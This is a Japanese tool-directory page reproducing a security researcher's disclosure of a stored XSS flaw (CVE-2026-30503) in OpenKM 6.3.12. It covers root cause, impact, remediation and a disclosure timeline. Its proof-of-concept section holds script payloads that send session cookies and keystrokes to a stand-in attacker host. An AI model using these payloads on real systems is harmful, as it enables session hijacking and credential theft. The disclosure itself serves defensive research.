Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/dharmstm/cve-2026-30503-openkm-6.3.12-stored-xss
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト論文と研究学習と教育
GitHubdharmstm/cve-2026-30503-openkm-6.3.12-stored-xss

CVE-2026-30503-OpenKM-6.3.12-Stored-XSS

CVE-2026-30503の詳細な開示。OpenKM v6.3.12の格納型XSS脆弱性。根本原因分析、PoCペイロード、影響評価、セキュリティ研究者とペネトレーションテスター向けの修復推奨事項を含む。

リポジトリを見る
13ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛡️ CVE-2026-30503 — OpenKM v6.3.12 における保存型XSS

CVE Badge OpenKM Type Disclosure Status

発見・報告: Dharmendra Kumar — セキュリティリサーチャー

サイバーセキュリティ | ペネトレーションテスト | 脆弱性研究 | 責任ある開示


📌 目次

  • 概要
  • CVE詳細
  • 影響を受ける製品
  • 脆弱性の説明
  • 根本原因分析
  • 影響とリスク評価
  • 概念実証 (PoC)
  • 修復と推奨事項
  • 開示のタイムライン
  • 参考文献
研究者について

🔍 概要

このリポジトリは、企業環境で広く使用されているオープンソースの文書管理システム OpenKM v6.3.12 で特定された保存型クロスサイトスクリプティング (XSS) 脆弱性である CVE-2026-30503 の責任ある開示を記録したものです。

この脆弱性により、認証された攻撃者が永続的な悪意のあるJavaScriptをアプリケーションに注入でき、その後影響を受けるコンテンツを閲覧するすべてのユーザー(管理者を含む)のブラウザコンテキストで実行されます。

⚠️ 深刻度: 高 | 攻撃ベクトル: ネットワーク | 必要な権限: 低 | ユーザー操作: 必要


📋 CVE詳細

項目詳細
CVE IDCVE-2026-30503
製品OpenKM
影響を受けるバージョンv6.3.12
脆弱性の分類保存型クロスサイトスクリプティング (XSS)
CWECWE-79: Improper Neutralization of Input During Web Page Generation
CVSSベクトルCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
研究者Dharmendra Kumar
開示の種類責任ある開示 / 協調的開示

📦 影響を受ける製品

OpenKM は、ビジネス文書の管理、監査、配布のためのウェブインターフェースを提供する、無料のオープンソース文書管理システム (DMS) です。世界中の企業、政府機関、教育機関で利用されています。

  • 製品名: OpenKM Document Management System
  • 影響を受けるバージョン: v6.3.12
  • ベンダーのウェブサイト: https://www.openkm.com
  • カテゴリ: 文書管理システム (DMS)
  • 言語/スタック: Java (JSP/Spring)

🧨 脆弱性の説明

OpenKM v6.3.12 では、複数の保存型クロスサイトスクリプティング (XSS) 脆弱性が発見されました。低権限の認証アクセスを持つ攻撃者は、1つ以上の入力フィールドに任意のJavaScriptペイロードを注入できます。これらのペイロードはアプリケーションのバックエンドに永続的に保存され、管理者を含むすべてのユーザーが影響を受けるページまたはコンポーネントにアクセスすると自動的に実行されます。

被害者が細工されたリンクをクリックする必要がある反射型XSSとは異なり、保存型XSSのペイロードはアプリケーション自体に埋め込まれるため、はるかに危険で永続的です。

脆弱なエンドポイント

  • 文書メタデータ、ノート、または命名フィールド内のユーザー制御の入力フィールド
  • アプリケーションは、ユーザー入力をブラウザにレンダリングし直す前にサニタイズまたはエンコードしない

🔬 根本原因分析

この脆弱性は、アプリケーションの入力処理パイプラインにおける3つの複合的な弱点に起因しています:

root@kitploit:~
User Input ──► [NO Validation] ──► Stored in DB ──► [NO Output Encoding] ──► Rendered in Browser ──► XSS Executed
弱点説明
❌ 入力検証の欠如アプリケーションはユーザー指定フィールドの特殊文字 (<, >, ", ', ;) を制限またはサニタイズしない
❌ 出力エンコードの欠如保存された値がHTMLエンティティエンコードなしで直接HTMLにレンダリングされる
❌ 安全でないDOMレンダリングユーザー指定データがCSPやサニタイズ制御なしでDOMコンテキストに埋め込まれる

💥 影響とリスク評価

この脆弱性の悪用に成功すると、以下につながる可能性があります:

リスク説明
🍪 セッションハイジャックdocument.cookie の外部送信による認証済みセッショントークンの窃取
👤 アカウント乗っ取り管理者アカウントを含む被害者アカウントの侵害
🔐 資格情報の収集ログイン資格情報を取得するためのフィッシングフォームの注入
📤 データの外部流出DMSから機密文書やメタデータを静かに抽出
⚙️ 不正な操作被害者に代わって特権操作を実行(文書の削除/変更)
🎯 管理者への標的化管理者がコンテンツを確認する際に管理パネルでペイロードが実行される
🔄 ワーム型感染自己複製型XSSペイロードがユーザー間で拡散する

🧪 概念実証 (PoC)

⚠️ 免責事項: このPoCは、責任ある開示の原則に基づき、教育およびセキュリティ研究目的でのみ共有されています。所有していないシステム、または明示的な書面によるテスト許可を得ていないシステムに対しては使用しないでください。

ペイロード例 (汎用)

root@kitploit:~
// Basic PoC — demonstrates script execution
<script>alert('CVE-2026-30503 - XSS by Dharmendra Kumar')</script>

// Session token exfiltration
<script>fetch('https://attacker.example.com/steal?c='+document.cookie)</script>

// Keylogger injection
<script>document.onkeypress=function(e){fetch('https://attacker.example.com/log?k='+e.key)}</script>

再現手順

  1. 低権限の認証アカウントでOpenKM v6.3.12にログインする
  2. 脆弱な入力フィールド(例: 文書メタデータ / ノート / タイトルフィールド)に移動する
  3. <script>alert(document.cookie)</script> などのXSSペイロードを注入する
  4. エントリを保存/送信する
  5. 別のユーザー(または管理者)としてログインし、影響を受けるリソースに移動する
  6. 被害者のブラウザコンテキストでJavaScriptペイロードが実行されることを確認する

🛠️ 修復と推奨事項

開発者 / ベンダー向け

推奨事項実装
✅ 入力検証許可文字をホワイトリスト化し、すべてのユーザー入力でHTML特殊文字を拒否または除去する
✅ 出力エンコードHTMLにデータをレンダリングする前に、コンテキスト認識型のHTMLエンコード(例: OWASP Java Encoder)を使用する
✅ コンテンツセキュリティポリシー (CSP)厳格なCSPヘッダーを実装する: Content-Security-Policy: script-src 'self'
✅ HTTPOnly & Secure CookieJSアクセスを防ぐため、すべてのセッションCookieに HttpOnly および Secure フラグを設定する
✅ セキュリティライブラリの使用HTMLサニタイズにOWASP AntiSamyまたはDOMPurifyを統合する
✅ セキュリティコードレビューサニタイズされていないユーザー制御データがないか、すべてのレンダリングパスを監査する
✅ アップグレードベンダー提供の最新パッチを適用するか、パッチ適用済みバージョンにアップグレードする

システム管理者向け

  • 🔒 OpenKMインスタンスへのアクセスを信頼できるネットワークのみに制限する
  • 📊 アプリケーションログで異常なアクティビティや入力フィールドの予期しないスクリプトタグを監視する
  • 🔄 アプリケーションを最新のパッチ適用済みリリースに更新し続ける
  • 🧩 補完的制御として、XSS検出ルールを備えたウェブアプリケーションファイアウォール (WAF) を導入する

📅 開示のタイムライン

日付イベント
🔍 発見OpenKM v6.3.12のセキュリティ評価中に脆弱性を特定
📧 ベンダーへの通知初期開示レポートをOpenKMセキュリティチームに提出
🤝 ベンダーの確認OpenKMチームがレポートを確認
📝 CVE割り当てCVE ProgramによってCVE-2026-30503が割り当てられる
🌐 公開開示修復期間後に協調的な公開開示を実施

この脆弱性は、公開前にベンダーおよびCVE Programと調整するという責任ある開示のベストプラクティスに従って開示されました。


📚 参考文献

  • 🔗 [ Github] (https://github.com/dharmstm/OpenKM-6.3-Stored-XSS-Report/).
  • 🔗 MITRE CVEエントリ — CVE-2026-30503
  • 🔗 NVD — 国家脆弱性データベース
  • 🔗 OpenKM公式ウェブサイト
  • 🔗 OWASP XSS防止チートシート
  • 🔗 CWE-79: クロスサイトスクリプティング
  • 🔗 OWASP Top 10 — A03:2021 インジェクション

👨‍💻 研究者について

Dharmendra Kumar

セキュリティリサーチャー | ペネトレーションテスター | バグハンター

Dharmendra Kumarは、ウェブアプリケーションセキュリティ、ペネトレーションテスト、責任ある脆弱性開示を専門とする独立系サイバーセキュリティリサーチャーです。広く使用されているソフトウェアにおける実際のセキュリティ欠陥の特定に注力し、世界中で使用されるアプリケーションのセキュリティ態勢の向上に貢献しています。

専門分野:

  • 🌐 ウェブアプリケーションのペネトレーションテスト
  • 🐛 バグバウンティハンティング
  • 🔍 脆弱性研究およびCVE報告
  • 📋 責任ある開示およびセキュリティアドバイザリ
  • 🛡️ OWASP Top 10脆弱性

連絡先:

LinkedIn GitHub Twitter


⚖️ 法的免責事項

このリポジトリは教育および情報提供のみを目的としています。ここで共有される脆弱性の詳細と概念実証ペイロードは、責任ある開示の原則に基づいて公開されています。著者は、この情報の不正使用を容認せず、奨励もせず、その責任も負いません。いかなるシステムでセキュリティテストを実施する前にも、必ず明示的な書面による許可を取得してください。


🙏 謝辞

特に以下の方々に感謝します:

  • 責任ある開示プロセス中の協力に対するOpenKM開発チーム
  • CVE識別子の割り当てと調整を行ったCVE Program / MITRE Corporation
  • すべての人にとってソフトウェアをより安全にするための継続的な取り組みを行う、より広範なセキュリティ研究コミュニティ

⭐ この研究が役に立った場合は、このリポジトリにスターを付けることを検討してください。

© 2026 Dharmendra Kumar — 無断転載を禁じます

Visitors

ツールをダウンロード